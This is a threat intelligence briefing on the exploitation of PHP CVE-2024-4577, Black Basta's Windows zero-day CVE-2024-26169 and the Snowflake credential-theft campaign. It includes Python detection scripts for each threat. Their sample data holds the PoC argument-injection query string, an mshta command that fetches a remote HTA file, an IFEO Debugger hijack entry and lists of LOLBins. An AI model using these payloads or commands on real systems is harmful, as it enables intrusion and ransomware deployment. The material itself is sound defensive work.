TLP: CLEAR - This information may be shared publicly
eSentire's Threat Response Unit (TRU) compiles the following weekly intelligence overview, providing cybersecurity leaders with expert analysis and insights on the most important events of the past week along with important security tips.
2024/06/12
PHP Vulnerability Exploited (CVE-2024-4577)
Bottom Line: A critical Remote Code Execution vulnerability in PHP is being actively exploited to deliver ransomware. As exploitation is ongoing, it is critical that organizations immediately apply the relevant security patches to minimize the likelihood of impact.
On June 6th, DEVCORE disclosed a critical vulnerability in PHP on the Windows operating system. The vulnerability, tracked as CVE-2024-4577 (CVSS: 9.8), is a Remote Code Execution (RCE) vulnerability that affects PHP when it runs in CGI mode (php-cgi.exe) or when the PHP binary is otherwise exposed by the web server, as in default XAMPP installations. Exploitation allows a remote, unauthenticated threat actor to reveal the source code of scripts and run arbitrary code on vulnerable servers. CVE-2024-4577 stems from the "Best-Fit" character mapping behaviour of the Windows operating system. When Windows converts a string to the system code page, Best-Fit substitutes the closest available character for one that cannot be represented; in particular, the soft hyphen (0xAD) becomes an ordinary hyphen (0x2D). A query string containing 0xAD therefore passes PHP's existing check for a leading dash, yet arrives at php-cgi.exe as a command-line option, allowing an attacker to pass options such as -d (set a php.ini directive) to the PHP binary. The issue is effectively a bypass of the fix for CVE-2012-1823. Windows systems using the Traditional Chinese, Simplified Chinese and Japanese locales are affected by default; other locales may be affected depending on configuration. Fixed versions are PHP 8.3.8, 8.2.20 and 8.1.29; the PHP 8.0, 7 and 5 branches are end of life and will not receive a fix.
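The following is an added example, not code from eSentire, DEVCORE or watchTowr, showing how a defender would spot the soft-hyphen argument injection described above in web server access logs. It percent-decodes the query string to bytes (so 0xAD survives), then looks for 0xAD immediately followed by a php-cgi short option and for the INI directives that turn an injected -d into code execution. The log lines, IP addresses and paths are constructed for illustration.

```python
"""Detect CVE-2024-4577-style argument injection against php-cgi.exe in access logs.

Added example for this briefing; it is not code from eSentire, DEVCORE, watchTowr
or Imperva. The access-log lines in SAMPLE_LOG are constructed for illustration.
"""
import re
from urllib.parse import unquote_to_bytes

# Request field of a combined-format access log: "METHOD TARGET HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# 0xAD is the Unicode soft hyphen. On the affected Windows code pages, Best-Fit
# mapping turns it into an ASCII hyphen (0x2D) when the query string is handed to
# php-cgi.exe as argv, so "%ADd" arrives as the "-d" option even though php-cgi's
# own check for a leading ASCII dash never saw one.
SOFT_HYPHEN = b"\xad"

# Soft hyphen followed by a php-cgi short option and an argument separator:
# -d (set INI directive), -s (show source), -n (no php.ini), -c (php.ini path).
# "+" is kept literal because unquote_to_bytes() does not turn it into a space.
OPTION_INJECTION_RE = re.compile(rb"\xad[dsnc](?=[ +]|$)")

# INI directives that turn an injected -d into code execution or source disclosure.
DANGEROUS_DIRECTIVES = (b"allow_url_include", b"auto_prepend_file", b"auto_append_file")


def analyze_query(raw_query: str) -> list[str]:
    """Return indicator names found in a still-percent-encoded query string."""
    # Decode to bytes, not str: %AD must remain the single byte 0xAD (it is not
    # valid UTF-8 on its own, and str-level decoding would mangle or hide it).
    decoded = unquote_to_bytes(raw_query)
    findings = []
    if SOFT_HYPHEN in decoded:
        findings.append("soft_hyphen_present")
    if OPTION_INJECTION_RE.search(decoded):
        findings.append("php_cgi_option_injection")
    if any(d in decoded.lower() for d in DANGEROUS_DIRECTIVES):
        findings.append("dangerous_ini_directive")
    return findings


def scan_log(lines):
    """Return (request_target, findings) for every line that carries an indicator."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        _path, _, query = target.partition("?")
        findings = analyze_query(query) if query else []
        if findings:
            hits.append((target, findings))
    return hits


# Constructed sample lines (TEST-NET addresses). The first mirrors the public
# PoC shape: two -d directives that make php-cgi prepend the POST body as code.
SAMPLE_LOG = [
    '198.51.100.7 - - [07/Jun/2024:10:01:12 +0000] "POST /php-cgi/php-cgi.exe'
    '?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 512',
    '198.51.100.8 - - [07/Jun/2024:10:01:13 +0000] "GET /index.php?page=home HTTP/1.1" 200 1024',
    '198.51.100.9 - - [07/Jun/2024:10:01:14 +0000] "GET /test.php?%ads HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for target, findings in scan_log(SAMPLE_LOG):
        print(f"{target}\n    {', '.join(findings)}")
```

The byte-level decode is the important design choice: a pipeline that decodes the query to a Unicode string first will either drop the lone 0xAD byte or normalize it, and the indicator disappears. The same reasoning applies to web application firewall rules; a rule that blocks query strings beginning with %ad (the commonly recommended interim mitigation for servers that cannot be patched) only works if it matches the raw, undecoded request.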
Only one day later, on June 7th, watchTowr released a technical analysis of the vulnerability as well as Proof-of-Concept (PoC) exploit code. Both Imperva and The Shadowserver Foundation observed exploitation attempts beginning the same day.
On June 10th, Imperva Threat Research reported that CVE-2024-4577 is being leveraged by threat actors to deliver TellYouThePass ransomware. The attackers exploited the vulnerability to execute arbitrary PHP code; using PHP's system() function, they invoked mshta.exe, a native Windows binary, to run an HTML Application (HTA) file hosted on an attacker-controlled web server. The HTA contained VBScript, which in turn resulted in the deployment of a .NET variant of TellYouThePass ransomware.
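The post-exploitation chain above (PHP calling system(), which on Windows goes through cmd.exe, then mshta.exe pulling a remote HTA) leaves a distinctive process tree. The following is an added example, not Imperva's or eSentire's detection content, that scores process-creation events for a web server worker spawning a living-off-the-land binary and for a script host that references remote content. The events are constructed and use the field names of Sysmon Event ID 1 (Image, ParentImage, CommandLine, User); the IP address and paths are placeholders.

```python
"""Flag web-server worker processes that spawn LOLBins, and LOLBins that pull
remote content, over process-creation telemetry.

Added example for this briefing, not Imperva's or eSentire's detection content.
Events are constructed and use the field names of Sysmon Event ID 1
(ProcessCreate): Image, ParentImage, CommandLine, User.
"""
import re
from dataclasses import dataclass

# Processes that should never be the parent of a shell or script host on a web server.
WEB_SERVER_IMAGES = {"php-cgi.exe", "php.exe", "httpd.exe", "nginx.exe", "w3wp.exe"}

# Living-off-the-land binaries commonly used to stage a second payload.
LOLBINS = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}

# Subset that will fetch and execute (or download) content from a URL directly.
REMOTE_EXEC_BINS = {"mshta.exe", "rundll32.exe", "regsvr32.exe", "powershell.exe",
                    "pwsh.exe", "certutil.exe", "bitsadmin.exe"}

# http(s) URL or UNC path anywhere on the command line.
REMOTE_REF_RE = re.compile(r"https?://|\\\\[\w.-]+\\", re.IGNORECASE)

THRESHOLD = 50


@dataclass
class ProcEvent:
    image: str
    parent_image: str
    command_line: str
    user: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Additive score plus human-readable reasons for one process-creation event."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    score, reasons = 0, []
    if parent in WEB_SERVER_IMAGES and child in LOLBINS:
        score += 50
        reasons.append(f"web_server_spawned_lolbin:{parent}->{child}")
    if child in REMOTE_EXEC_BINS and REMOTE_REF_RE.search(ev.command_line):
        score += 50
        reasons.append(f"remote_content_in_command_line:{child}")
    return score, reasons


def find_suspicious(events, threshold=THRESHOLD):
    """Return [(event, score, reasons)] for events at or above the threshold."""
    out = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            out.append((ev, score, reasons))
    return out


# Constructed events. PHP's system() on Windows runs through "cmd.exe /c", so the
# chain appears as php-cgi.exe -> cmd.exe -> mshta.exe rather than as one hop,
# and each hop is a separate event with only its direct parent recorded.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\xampp\php\php-cgi.exe",
              "cmd.exe /c mshta http://203.0.113.10/update.hta", r"NT AUTHORITY\SYSTEM"),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\cmd.exe",
              "mshta http://203.0.113.10/update.hta", r"NT AUTHORITY\SYSTEM"),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              r'mshta "C:\Users\jdoe\Documents\help.hta"', r"CORP\jdoe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\svchost.exe", "powershell.exe -c Get-Date",
              r"NT AUTHORITY\SYSTEM"),
]

if __name__ == "__main__":
    for ev, score, reasons in find_suspicious(SAMPLE_EVENTS):
        print(score, basename(ev.parent_image), "->", basename(ev.image), reasons)
```

Because Sysmon records only the direct parent, the two rules deliberately fire on different hops of the chain: the web server spawning cmd.exe trips the first rule, and the mshta.exe invocation with a URL trips the second, so the intrusion is caught even if one of the two events is missed.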
The rapid weaponization of CVE-2024-4577 shows how little time defenders have once a vulnerability is public. In this case a security research company developed and published PoC exploit code within a day of disclosure, and exploitation attempts were observed the same day. Public PoC code significantly lowers the barrier for less skilled threat actors to weaponize a vulnerability; here the transition from disclosure to in-the-wild exploitation took roughly 24 hours, and ransomware deployment followed within days.
The TellYouThePass ransomware group is not sophisticated, but it has a track record of rapidly adopting public exploits for new vulnerabilities to compromise victims; past examples include CVE-2021-44228 (Log4Shell) and CVE-2023-46604 (Apache ActiveMQ). This shows how threat actors chase widely publicized vulnerabilities to maximize impact.
Such swift weaponization poses significant risk and underlines the need for proactive patch management and prompt deployment of security updates. Where patching is not possible, for example on end-of-life PHP branches, organizations should apply the interim mitigations: block query strings that begin with %ad at the web server, or move away from CGI mode entirely in favour of Mod-PHP, FastCGI or PHP-FPM.
eSentire’s Threat Response Unit (TRU) has taken proactive measures to address the threat posed by CVE-2024-4577. The Tactical Threat Response (TTR) team has developed new detections within eSentire MDR for Network to identify and respond to exploitation attempts. Additionally, eSentire’s Managed Vulnerability Service (MVS) includes plugins specifically designed to identify this vulnerability. eSentire’s Threat Intelligence team conducted threat hunts across the entire eSentire client base to uncover any signs of exploitation. Furthermore, IP addresses associated with real-world attacks are blocked through the eSentire Global Block list, enhancing the security posture for all clients.
Bottom Line: The Black Basta ransomware gang has been exploiting a high-severity Windows vulnerability, potentially for months before a patch was available.
On June 12th, Symantec released a report on the Black Basta ransomware group, operated by the Cardinal cybercrime group (aka Storm-1811, UNC4393), exploiting a high-severity Windows vulnerability as a zero-day. The flaw, tracked as CVE-2024-26169 (CVSS: 7.8), is a privilege escalation vulnerability in the Windows Error Reporting Service. Because the driver werkernel.sys creates registry keys with a null security descriptor, a low-privileged attacker can modify those keys, which ultimately allows code execution with SYSTEM privileges.
The attacks are attributed to Black Basta because of the use of batch scripts masquerading as software updates, which run malicious commands and establish persistence on compromised systems, a tactic commonly used by the group. Symantec's report describes an attempted ransomware attack in which an exploit tool for CVE-2024-26169 was deployed.
The report suggests the group exploited the vulnerability months before Microsoft patched it in March 2024. Symantec highlights two variants of the exploit tool used in the attacks, with compilation timestamps of February 27th, 2024 and December 18th, 2023, the latter predating the patch by almost three months. The exploit was deployed following an initial infection by DarkGate malware, which Black Basta has used for initial access since the takedown of the Qakbot botnet in 2023.
The tool exploits the fact that werkernel.sys uses a null security descriptor when creating registry keys, so the keys it creates are writable by any user. The tool uses this to create the registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WerFault.exe and set its "Debugger" value to the path of its own executable. Windows launches the program named in an Image File Execution Options "Debugger" value whenever the target executable is started, so the attacker's binary runs in the context of the privileged component that starts WerFault.exe, yielding a shell with SYSTEM privileges.
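Regardless of how the attacker obtained write access to the key, the hijack itself is visible as a registry write to an Image File Execution Options "Debugger" value. The following is an added example, not Symantec's or eSentire's detection logic, that assesses registry value-set events for that pattern and raises the severity when the target is a binary Windows launches with SYSTEM privileges, when the registered debugger lives in a user-writable directory, or when a process registers itself as the debugger, as the exploit tool described above does. Events are constructed and use the field names of Sysmon Event ID 13 (TargetObject, Details, Image); paths are placeholders.

```python
"""Detect Image File Execution Options (IFEO) Debugger hijacks, the primitive the
CVE-2024-26169 exploit tool uses once it can write under HKLM.

Added example for this briefing, not Symantec's or eSentire's detection logic.
Events are constructed and use the field names of Sysmon Event ID 13
(RegistryEvent, value set): TargetObject, Details, Image.
"""
import re
from dataclasses import dataclass

IFEO_DEBUGGER_RE = re.compile(
    r"\\Image File Execution Options\\(?P<exe>[^\\]+)\\Debugger$", re.IGNORECASE)

# Binaries that Windows itself starts in a privileged (SYSTEM) context; a Debugger
# value on any of these hands the attacker that context.
SYSTEM_LAUNCHED = {"werfault.exe", "werfaultsecure.exe", "wermgr.exe", "dllhost.exe",
                   "svchost.exe", "taskhostw.exe", "consent.exe", "utilman.exe"}

# Locations a standard user can write to; a debugger living there is rarely legitimate.
USER_WRITABLE_RE = re.compile(
    r"^[A-Z]:\\(?:Users|ProgramData|Windows\\Temp)\\", re.IGNORECASE)


@dataclass
class RegEvent:
    target_object: str   # full registry path of the value that was set
    details: str         # new value data as Sysmon renders it
    image: str           # process that performed the write


def debugger_exe(details: str) -> str:
    """Executable portion of a Debugger value (strips quotes and trailing arguments)."""
    details = details.strip()
    if details.startswith('"'):
        return details[1:].split('"', 1)[0]
    return details.split(" ", 1)[0]


def assess(ev: RegEvent):
    """None if the event is not an IFEO Debugger write, else a finding with severity."""
    m = IFEO_DEBUGGER_RE.search(ev.target_object)
    if not m:
        return None
    exe = m.group("exe").lower()
    debugger = debugger_exe(ev.details)
    reasons = []
    if exe in SYSTEM_LAUNCHED:
        reasons.append("target_runs_as_system")
    if USER_WRITABLE_RE.match(debugger):
        reasons.append("debugger_in_user_writable_path")
    if debugger.lower() == ev.image.lower():
        reasons.append("process_registered_itself_as_debugger")
    # Any IFEO Debugger write deserves review; the reasons above make it urgent.
    return {"exe": exe, "debugger": debugger,
            "severity": "high" if reasons else "medium", "reasons": reasons}


def find_ifeo_hijacks(events):
    """All IFEO Debugger findings, in event order."""
    return [f for f in map(assess, events) if f is not None]


# Constructed events: an exploit-style self-registration on WerFault.exe, a
# debugger registration by an installer, and an unrelated IFEO value.
SAMPLE_EVENTS = [
    RegEvent(r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WerFault.exe\Debugger",
             r"C:\Users\Public\svc.exe", r"C:\Users\Public\svc.exe"),
    RegEvent(r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe\Debugger",
             r'"C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\vsjitdebugger.exe" -p %ld -e %ld',
             r"C:\Windows\System32\msiexec.exe"),
    RegEvent(r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WerFault.exe\GlobalFlag",
             "DWORD (0x00000200)", r"C:\Windows\regedit.exe"),
]

if __name__ == "__main__":
    for finding in find_ifeo_hijacks(SAMPLE_EVENTS):
        print(finding["severity"], finding["exe"], "->", finding["debugger"], finding["reasons"])
```

Developer tooling does legitimately set IFEO Debugger values, which is why an unqualified write is reported at medium rather than suppressed; the combination of a SYSTEM-launched target and a debugger under C:\Users is what separates the CVE-2024-26169 tool from a debugger installation.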
The Black Basta campaign exploiting CVE-2024-26169 is significant because it shows a ransomware operation using a zero-day rather than waiting for public exploits. Organizations must prioritize updates, monitor for anomalies such as unexpected Image File Execution Options changes and privilege escalation on endpoints, and have effective response strategies in place to limit the impact of such threats.
While a compilation timestamp months before the patch is notable, timestamps alone are not definitive proof that an exploit was used as a zero-day, since they can be modified. In this instance, however, the attackers had no obvious reason to backdate the timestamp, which suggests the exploit was built, and very likely used, before a patch was available. This indicates a high likelihood that the vulnerability was actively leveraged as a zero-day by the Black Basta group.
As the vulnerability was patched in Microsoft's March 2024 Patch Tuesday release, organizations that are not yet up to date should apply the patch immediately. Endpoint agents (EDR) provide an additional layer of defense that can detect and block ransomware deployment even when initial access or privilege escalation relies on a zero-day vulnerability.
Bottom Line: Customers of cloud-based data warehouse platform Snowflake were the target of data extortion attacks in April and May 2024. As organizations increasingly migrate to cloud environments, Software-as-a-Service (SaaS) products are becoming prime targets for cyber threats.
On June 2nd, Snowflake, alongside CrowdStrike and Mandiant, issued a joint statement on an ongoing investigation into a targeted threat campaign against some Snowflake customer accounts. Key findings include:
On June 10th, Mandiant (part of Google Cloud) released a detailed report on a financially motivated threat actor targeting Snowflake customer databases since at least April 2024. The group, tracked as UNC5537, leverages stolen credentials to gain unauthorized access to Snowflake instances, leading to extensive data theft and extortion attempts. This campaign has compromised hundreds of Snowflake customer accounts, exfiltrating sensitive data and attempting to extort victims or sell the data on cybercrime forums.
UNC5537 primarily uses credentials obtained via infostealer malware, including VIDAR, RISEPRO, REDLINE, RACCOON STEALER, LUMMA and META. Many of these credentials were stolen as far back as 2020 from devices used for both personal and professional activities, and were still valid because they had never been rotated. The attackers utilize various tools to access Snowflake instances, including Snowflake's web-based UI, the command-line tool SnowSQL, and a custom reconnaissance utility named "rapeflake" (tracked by Mandiant as FROSTBITE). The compromised accounts shared three weaknesses: MFA was not enforced, the stolen credentials had not been rotated, and no network policy restricted access to trusted locations. Once access is obtained, UNC5537 executes SQL commands to stage and transfer data. The group uses VPN services and VPS systems alongside commercial cloud storage services to access victim instances and store stolen data.
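The three weaknesses above are all visible in Snowflake's own login telemetry. The following is an added example, not Mandiant's or Snowflake's published hunting queries, that triages login records for password-only authentication, a single source IP authenticating as many distinct users in a short window, and a dormant account suddenly logging in again. The rows are constructed but use the real column names of SNOWFLAKE.ACCOUNT_USAGE.LOGIN_HISTORY; the user names, client types and addresses are placeholders.

```python
"""Triage Snowflake LOGIN_HISTORY rows for the UNC5537 access pattern:
password-only logins, one IP authenticating as many users, dormant accounts
coming back to life.

Added example for this briefing, not Mandiant's or Snowflake's hunting queries.
Rows are constructed but use column names from SNOWFLAKE.ACCOUNT_USAGE.LOGIN_HISTORY.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def _row(ts, user, ip, client, first, second, ok=True):
    return {
        "EVENT_TIMESTAMP": datetime.fromisoformat(ts),
        "USER_NAME": user,
        "CLIENT_IP": ip,
        "REPORTED_CLIENT_TYPE": client,
        "FIRST_AUTHENTICATION_FACTOR": first,
        "SECOND_AUTHENTICATION_FACTOR": second,   # None when no MFA was used
        "IS_SUCCESS": "YES" if ok else "NO",
    }


# Constructed rows (TEST-NET-2 addresses). One IP works through several
# accounts from an old infostealer dump, including a contractor unused since 2020.
LOGIN_HISTORY = [
    _row("2020-11-03T08:00:00", "OLDCONTRACTOR", "198.51.100.23", "SNOWFLAKE_UI", "PASSWORD", None),
    _row("2024-02-01T09:10:00", "SVC_ETL", "198.51.100.21", "PYTHON_DRIVER", "RSA_KEYPAIR", None),
    _row("2024-03-08T09:00:00", "ANALYST_A", "198.51.100.20", "SNOWFLAKE_UI", "PASSWORD", "DUO_PUSH"),
    _row("2024-04-14T03:12:00", "ANALYST_A", "198.51.100.77", "SNOWSQL", "PASSWORD", None),
    _row("2024-04-14T03:15:00", "FINANCE_RO", "198.51.100.77", "SNOWSQL", "PASSWORD", None),
    _row("2024-04-14T03:21:00", "OLDCONTRACTOR", "198.51.100.77", "JDBC_DRIVER", "PASSWORD", None),
    _row("2024-04-14T03:40:00", "CEO_DASH", "198.51.100.77", "SNOWSQL", "PASSWORD", None, ok=False),
    _row("2024-04-15T10:00:00", "ANALYST_B", "198.51.100.22", "SNOWFLAKE_UI", "PASSWORD", "DUO_PUSH"),
]


def password_only_logins(rows):
    """Users with a successful login authenticated by a password and nothing else."""
    return sorted({r["USER_NAME"] for r in rows
                   if r["IS_SUCCESS"] == "YES"
                   and r["FIRST_AUTHENTICATION_FACTOR"] == "PASSWORD"
                   and r["SECOND_AUTHENTICATION_FACTOR"] is None})


def ips_spraying_users(rows, min_users=3, window=timedelta(hours=1)):
    """Source IPs that tried >= min_users distinct users within `window`.
    Failed attempts count too: credential stuffing from a stale dump produces them."""
    by_ip = defaultdict(list)
    for r in sorted(rows, key=lambda r: r["EVENT_TIMESTAMP"]):
        by_ip[r["CLIENT_IP"]].append(r)
    hits = {}
    for ip, events in by_ip.items():
        for i, start in enumerate(events):
            users = {e["USER_NAME"] for e in events[i:]
                     if e["EVENT_TIMESTAMP"] - start["EVENT_TIMESTAMP"] <= window}
            if len(users) >= min_users:
                hits[ip] = sorted(users)
                break
    return hits


def dormant_reactivations(rows, gap=timedelta(days=90)):
    """(user, previous_login, new_login) for successful logins after >= `gap` of silence."""
    last, out = {}, []
    for r in sorted(rows, key=lambda r: r["EVENT_TIMESTAMP"]):
        if r["IS_SUCCESS"] != "YES":
            continue
        user, ts = r["USER_NAME"], r["EVENT_TIMESTAMP"]
        if user in last and ts - last[user] >= gap:
            out.append((user, last[user], ts))
        last[user] = ts
    return out


if __name__ == "__main__":
    print("password-only users:", password_only_logins(LOGIN_HISTORY))
    print("spraying IPs:", ips_spraying_users(LOGIN_HISTORY))
    print("dormant reactivations:", dormant_reactivations(LOGIN_HISTORY))
```

Each function answers one of the questions a responder would ask after reading the report: who can still log in without a second factor, which source address is cycling through a list of accounts, and which long-unused identities have suddenly become active. Running the same logic directly as SQL against ACCOUNT_USAGE is the production form; the Python version makes the conditions explicit and testable on exported rows.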
Due to the increasing use of SaaS platforms, organizations expose themselves to new vulnerabilities and attack paths. The products often store vast amounts of sensitive data and are integral to business operations, offering a lucrative target for financially motivated threat actors.
On June 13th, Mandiant released a report on a separate financially motivated threat actor targeting SaaS applications, which points to a broader trend of threat actors moving against SaaS applications and cloud environments. UNC3944 (aka 0ktapus, Octo Tempest, Scatter Swine and Scattered Spider) has been compromising user credentials through social engineering techniques such as SMS phishing, SIM swapping and MFA fatigue to gain unauthorized access to identity providers and cloud platforms, including Amazon Web Services (AWS), Google Cloud Platform (GCP) and Microsoft Azure, as well as the SaaS applications federated through them.
Both UNC5537 and UNC3944 rely heavily on stolen credentials to gain initial access. UNC3944 employs social engineering tactics to steal credentials from mobile devices and administrative accounts, while UNC5537 uses credentials obtained from infostealer malware. Monitoring dark web marketplaces allows organizations to identify breaches and stolen credentials before threat actors steal data or perform other malicious actions. Dark Web Monitoring services can greatly assist organizations in identifying and responding to similar attacks.
The Snowflake incident underscored the risks of Single-Factor Authentication (SFA). Similarly, UNC3944's campaigns exploit environments where MFA is not enforced or where weaker MFA methods (SMS codes, push approvals) can be manipulated, allowing easier access to critical systems. This highlights the importance of phishing-resistant MFA, such as FIDO2 hardware tokens, which remains effective even when login credentials are compromised and cannot be approved by a fatigued user.
In some cases, the compromised corporate devices were being misused by employees for gaming and downloading pirated software. Using corporate devices for personal activities adds additional risk and should be avoided. Similarly, unless explicitly allowed, personal devices should not be used for work related tasks, as unmonitored devices may lead to the loss of sensitive data including credentials.
UNC3944 employs native cloud tools and functionality to maintain persistence and evade detection, such as leveraging Azure's serial console and various administrative tools. This mirrors UNC5537's use of Snowflake's built-in features for data exfiltration. Both campaigns highlight weaknesses in cloud and SaaS security practices, particularly around Identity and Access Management (IAM). Because legitimate tools and valid credentials are used, detection is difficult, so organizations need detection and response capabilities that focus on anomalous identity use, lateral movement and privilege escalation within cloud environments rather than on malware alone.
The Snowflake incident and the broader targeting of SaaS applications illustrates the evolving nature of cyber threats against cloud services. By understanding the tactics used by these threat actors and implementing robust security measures, organizations can better protect their sensitive data and maintain the integrity of their cloud environments.
The threat briefing is a weekly intelligence overview for non-technical users. The Threat Intelligence team at eSentire investigates, analyzes, and organizes the most important events of the past week along with important security tips and redistributes the findings for quick reading. The main goal of this briefing is to improve the overall awareness of readers regarding cyber security.
Our industry-renowned Threat Response Unit (TRU) is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds detection models across our XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. TRU has been recognized for its threat hunting, original research and content development capabilities. TRU is strategically organized into cross-functional groups to protect you against advanced and emerging threats, allowing your organization to gain leading threat intelligence and incredible cybersecurity acumen.